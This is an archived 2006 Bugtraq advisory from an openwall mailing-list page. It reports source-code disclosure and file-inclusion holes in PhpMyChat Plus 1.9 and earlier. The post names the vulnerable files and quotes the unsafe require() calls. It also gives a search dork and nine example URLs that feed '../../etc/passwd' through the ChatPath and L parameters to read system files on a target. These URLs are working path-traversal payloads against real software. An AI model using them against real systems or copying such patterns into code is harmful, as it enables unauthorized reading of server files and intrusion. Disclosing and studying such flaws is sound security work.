lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061108161147.10296.qmail@securityfocus.com> Date: 8 Nov 2006 16:11:47 -0000 From: ajannhwt@...mail.com To: bugtraq@...urityfocus.com Subject: PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities a******************************************************************************* # Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities # Author : ajann # Dork : phpMyChat plus # Vuln; ******************************************************************************* [Files] avatar.php colorhelp_popup.php color_popup.php index.php index1.php /lib/connected_users.lib.php /lib/index.lib.php logs.php phpMyChat.php3 [/Files] [Code,1] connected_users.lib.php Error: .. .... require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php"); require("./${ChatPath}/lib/clean.lib.php"); .... .. Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] L=[file] Key [:] ChatPath=[file] \Example: http://target.com/path/avatar.php?ChatPath=../../etc/passwd http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd http://target.com/path/color_popup.php?ChatPath=../../etc/passwd http://target.com/path/index.php?ChatPath=../../etc/passwd http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd http://target.com/path/avatar.php?ChatPath=../../etc/passwd http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd http://target.com/path/logs.php?L=../../etc/passwd http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd # ajann,Turkey # ... # Im not Hacker!